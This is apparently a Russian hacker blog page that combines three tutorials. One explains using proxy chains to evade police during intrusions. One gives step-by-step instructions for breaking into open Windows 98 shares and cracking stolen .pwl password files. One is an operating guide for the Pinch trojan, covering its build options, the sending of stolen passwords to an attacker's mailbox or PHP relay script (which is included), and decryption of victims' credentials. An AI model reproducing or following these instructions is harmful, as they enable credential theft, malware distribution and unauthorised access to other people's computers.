Официально прокси серверы используются для более быстрого серфинга инета. Например, ты с другом Васей любишь Бритни Спирс. Ее сайт находится на сервере какого-нибудь Парагвая, где инет дохлейший, а ты сидишь на диалапе. А прокси сервер находится в твоем городе. Таким образом, твой друг качает фотки Бритни через прокси, прокси сохраняет их (кэширует), а ты уже пытаясь скачать фотки с гнилого Парагвайского сайта, автоматически качаешь их с сервера прокси.
Но хакеры используют прокси с другой целью. Существуют два типа прокси: прозрачные и непрозрачные. Прозрачные отдадут логи (записи о тебе) интересующимся лицам и глазом не моргнут, а вот непрозрачные логов не пишут, твой ИП не палят, могут кстати и свой не палить))) Если встретишь названия анонимный или элитный – не пугайся – это те же непрозрачные яйца, только в профиль).
Прокси частенько падают от наплыва не желающих палиться хакеров и киддисов. Также проксики падают от рук дядек в погонах. Ищи на поисковиках, хотя чего душой кривить, найти хорошие бесплатные и быстрые прокси бывает трудновато. Я их беру с web-hack.ru. Там их немного, зато меняются каждые три часа.
Думаю, знаешь, где вписать прокси в браузере?
Теперь поговорим о том, как узнать, действительно ли прокси непрозрачные. Забиваем проксик в браузер и идем leader.ru/secure/who.html. Смотрим и сравниваем, что известно администратору о твоем компе. Если известно слишком много(твой реальный ИП), то откидываем проксик.
Теперь поговорим, о программных средства работы с прокси.
ProxyChecker – лучшая, на мой взгляд прога для определения анонимности прокси. Определяет скорость прокси и его расположение. Обязательно юзай ее!
A4Proxy - делает в принципе то же самое. Но она еще может составлять цепочки из прокси и разделять траффик. Тебя соответственно будет тяжелее спалить. Прикинь ментяры будут проверять каждый сервер из цепочки? Заколебутся!
Следующий шедевр – это SocksChain. Этот монстр сам скачивает списки прокси и сокс( сокс – это почти то же что и прокси, о нем в следующей статье) ты уже составляешь из них цепочки. Только не забудь прописать в настройках браузера 127.0.0.1!
Есть различные хакерские тулзы, для которых не прописано использование прокси. В этом случае ты используешь проги типа Freecap,ProxyCap и т.д., которые перенаправляют любой трафик через прокси.
Стоит отметить, что дядьки в погонах сами создают анонимные прокси и палят людей их использующих, поэтому только цепочки!
Лично я написал плакатик: «помни о прокси!» После того, как мне один раз ломаемый сервер не выдал строчку: «Ваш ИП и время были сохранены». Поэтому думай!

Вообще статья написана только для ознакомления. НЕ ПРИМЕНЯЙ НЕХОРОШИЕ ЗНАНИЯ НА ПРАКТИКЕ.



Взлом
Обьясняю принцип : Когда ты выходишь в Интернет, то ты входишь в сеть (т.е. имеется возможность заходить на другие компы!). Приготовления : Зайди в "Мой компьтер" --> "Панель Управления" --> "Сеть". Должны быть установлены следущие компоненты : Клиент для сетей Microsoft Контроллер удаленного доступа NetBEUI TCP/IP Наверняка у тебя нет "Клинта для сетей Microsoft" и "NetBEUI". Клиент : Кнопка "Добавить" --> "". В отрывшем окне выбери "клиент", справа - "Клиент для сетей Microsoft". NetBEUI : Кнопка "Добавить" --> "". В отрывшем окне выбери "Протокол". В отрывшем окне выбери "Microsoft", - "NETBEUI". Всё,Нажми "ОК", перезагрузись .
Дальше мы настроем свойства соединения :
Зайди в "Мой компьютер" --> "Удаленный доступ к сети".
Выбери своё соединение, вызови "Свойства".
На Вкладке "Тип сервера" должны быть галочки на :

Войти в сеть
Программное сжатие данных
NetBEUI
TCP/IP
Каких нет добавь! Итак, с настройками все ОК.

Устaновка программ :
Тебе понадобяться 2 программы :
Shared Resourse Scanner 6.2 ,сама прога которая заходит на чужие компьютеры. crack
PwlToolsNet 6.5, она расшифровывает пароли, которые вы "позаимствовали".
Скачай программы, установи (это несложно) их.
Готово !!!

Взлом :
Входишь в Интернет,
Нажимаешь "ПУСК" "Выполнить".
Впиши в поле winipcfg
В откывшемся окне запомни Ip-адрес !
Он примерно такой : 192.168.255.45 Т.е. из 4 цифр
Теперь запусти srs ,( Shared Resourse Scanner 6.2 , который вы скачали ),
Справа панель управления ,
Там где 2 поля, делящиеся на точки впиши Ip-адрес :
Допустим у тебя 192.168.255.45,
то в верхнее поле вписываешь весь Ip-адрес,
только самое последнее - изменяете на "1"
Было 192.168.255.45, пишешь 192.168.255.1
В нижнее поле впиши также, только последнее -
измени на "255".Было 192.168.255.45, пишешь 192.168.255.255
Теперь в поле "Time Out:" Впиши "100".
СТАРТ !

В окне программы появяться компы .
Тонким шрифтом обозначены защищенные компы.
Жирным шрифтом - плохо защищенные.
Красным толстым - полностью открытые.
Заходи на компы с пометкой Win98/Me.
Выделяешь жирный или красный комп --> "Открыть"
В открывшемся, через некоторое время,окне будут диски ламера.
Выбери диск "С",далее папку "Windows" или "Win98" или "Win" или "Windows",
В общем системную папку Windows 98.
Найди файлы с расширением файла *.pwl (Но если у тебя нормально работает
PwlNetTools,то файл будет в виде такого значка :

Итак, копируем его к себе .
Открываем программy PwlNetTools.
Кнопка "Browse" --> Выбираем файл,который мы скачали.
Кнопкой "CheckPass" Мы узнаём пароли .
Вот, собственно и всё.
P.S. Кстати насчёт ловли хакеров-самоучек :
Ты выходишь в Интернет под чужими паролями,
Сидишь, короче, наслаждаешься.
Тот человек, у кого ты "позаимствовал" Интернет тоже
хочет зайти. Вот заходит он -"Проверка имени и пароля".
"Ошибка : Такой пользователь существует".
Он, матерясь, звонит на телефон поддержки.
-Вы, мля ,чё творите !У меня не заходит ,МЛЯ !
-Ой, сейчас мы посмотрим !
Смотрят они - такой уже лазит в просторах WWW.
Определяют телефон - Пиз@ец !
P.P.S. Чтобы такого не было определи, в какое время
Этот Чайник сидит в Интернете.
P.P.P.S. Если тебе что-то непонятно или хочешь новых статей, то пиши :
firemanfort@inbox.ru






Инструкция по Pinch 1.0
Данный троян получил довольно большое распространение в 2003/2004 году. Все благодаря возможности красть большое кол-во паролей (ICQ99b-2003a/Lite/ICQ2003Pro, Miranda IM, Trillian ICQ&AIM, &RQ, The Bat!, The Bat! 2, Outlook/Outlook Express, IE autocomplete & protected sites & ftp (9x/ME/2000/XP), FAR Manager (ftp), Win/Total Commander (ftp), RAS (9x/Me/2k/xp supported)), маленькому весу, открытым исходникам и легкостью создания троя для конкретной задачи. Троян имеет следующие возможности:

- Отправлять конфигурацию компьютера жертвы: ОС, оператика, CPU, HDD, logged user, host name, IP
- Шпион клавиатуры (Key-log)
- Удаленная консоль (Remote console)
- Обход Firewall`а
- Отправка всех паролей на E-mail используя SMTP-сервер
- Шифрование украденных паролей пересылаемых по почте
- Автоудаление трояна после запуска
- HTML/Text отчеты
- Размер файла примерно 10Kb
- Модульная система
- И многое другое...

Троян написал coban2k (http://www.cobans.net) - довольно известный человек в мире ICQ-хакинга. По причине проблем с хостингом по поводу хранения трояна на их сервере, автор был вынужден убрать это творение с своего сайта. Однако троян вы всегда можете найти на нашем сайте (http://www.web-hack.ru/download/info.php?go=49). К сожалению уже почти все антивирусы находят этот трой и его можно впарить только жертве, у которой не стоит антивируса.

============
Комплектация
============

В архив (pinch_1.0.zip) с трояном входят следующие папки и файлы:

\PinchBuilder.exe - мастер для создания трояна
\Parser.exe - программа для расшифровки закодированных писем с паролями
\readme.txt - без комментариев
\Pinch\ - главная папка с asm-исходниками трояна и компилятором
\Sources\ - остальные исходники
\TB!2 Plugin (Auto-parser)\ - папка с плагином для The Bat 2!, который декодирует зашифрованные письма с паролями, приходящими на ваш почтовый ящик
\Sources\Script\ - PHP-скрипт, через который отсылаются пароли при выборе соответствующей опции при компиляции (читайте далее)

================
Компилируем трой
================

В комплекте поставляется специальный мастер (PinchBuilder.exe), который и занимается созданием трояна по вашим требованиям и компиляцией трояна прямо на вашем компьютере. Программа имеет две главные вкладки: Compile и Decrypt. Первая служит для создания трояна, а вторая для расшифровки паролей (по сути эта вкладка является результатом работы файла Parser.exe). Далее идут три под-вкладки: SMTP, HTTP и FILE. В них задаются вариант вывода паролей. Разберем каждую подробнее:

====
SMTP
====

В поле Server вводим адрес (hostname/ip) SMTP-сервера. Если вы ввели домен сервера, то нажмите Resolve, чтобы домен сервера принял вид IP-адреса. Далее в полях From и To указываем свое мыло. Кнопка Send test massage служит для тестовой отправки письма, через настройки указанные вами. Настоятельно рекомендую ей воспользоваться. Если письмо не приходит, то это значит, что есть какие то проблемы с отправкой (включенный фаерволл, плохой SMTP, не нажали на Resolve и т.д.).

Хочу заметить, что последнее время большинство провайдеров переходят на систему, по которой их клиенты могут отправить письма ТОЛЬКО с ИХ SMTP-вервера. В таких случаях рекомендую пользоваться методом отправки писем, через HTTP.

====
HTTP
====

Закачиваем файл \Sources\Script\view.php на сервер поддерживающий PHP-скрипты и исполняющие функцию mail(). Далее в поле URL указываем путь к этому скрипту (например, http://www.xss.ru/pinch.php). В поле Subject указываем имя темы, с которой будут оправляться письма. В поле Status check str должна находиться строка, которая выдается скриптом после его загрузки. В скрипте идущем в комплекте с троем оно имеет значение: _ret_ok_1 :

Если данное значение не будет принято трояном, то он будет пытаться отправить письмо через этот скрипт каждую минуту, пока не получит в ответ строку из поля Status check str. Я вам рекомендую использовать скрипт не из стандартной поставки, а написанный мной:


// Author: Terabyte
$email=$_POST['a'];
$subject=$_POST['b'];
$msg=$_POST['c'];
if (isset($email) and isset($subject) and isset($msg)) {
mail($email,$subject,$msg, "From: $email");}
?>

Делает он почти тоже самое, но более грамотно написан. Огромным плюсом при использовании данного метода отправки паролей являеся, тот факт, что он позволяет отправлять пароли в обход Firewall`а. Как это достигается? Вот вырезка из лога outpost`а в момент отправки пароля через скрипт с моего сайта:

Имя процесса: iexplorer.exe
Протокол: HTTP
Удаленный адрес: www.web-hack.ru

Я думаю все поняли, кто не в танке =) Так же из плюсов я могу я могу выделить возможность записывать зашифрованные письма на вашем сайте, а не отправлять на мыло; возможность менять мыло на которое отсылаются пароли, на случай если его удалят; при массовой рассылке троя (чтобы пароли могли быть отправлены даже с тех провайдеров, где отключен доступ ко всем SMTP-серверам, кроме их него)

====
FILE
====

На данный вкладке задается путь к файлу, в который сохранятся все пароли. Для этого в поле Path надо записать путь к файл (например, C:\password.txt).

================
Compiler Options
================

В данной области все понятно, тут надо просто поставить галочки в тех полях, где вам это требуется. Стоит обратиться внимание на поле Add Icon. В нем указывает путь к иконке с которой будет отображаться скомпилированный троян. Хочу заметить что на моей системе (Windows XP) мне так и не удалось скомпилировать троя с этой включенной опцией и ее пришлось отключить.

В полях Protocol указываем метод, которым будут отправляться пароли (SMTP/HTTP/FILE). Далее нажимаем кнопку Compile и должна пойти компиляция трояна, который сохранится в основную папку с мастером для его создания.

===================
Расшифровка паролей
===================

Допустим вам удалось впарить ламеру этот трой и вам на мыло пришли пароли с машины жертвы. Дело в том, что при пересылке пароли шифруются и их для начала надо расшифровать (если у вас не установлен специальный плагин к TheBat! описанный выше). Копируем в буфер обмена текст с закодированными паролями, открываем Parser.exe (или вкладку Decrypt в PinchBuilder.exe) и нажимаем в контекстном меню пунк Process Data (или просто нажимаем комбинацию клавиш Alt+C). Далее программа выдаст вам все данные украденные у жертвы с удобном виде. Далее вы можете их сохранить или распечатать.

Комментариев нет:

Отправить комментарий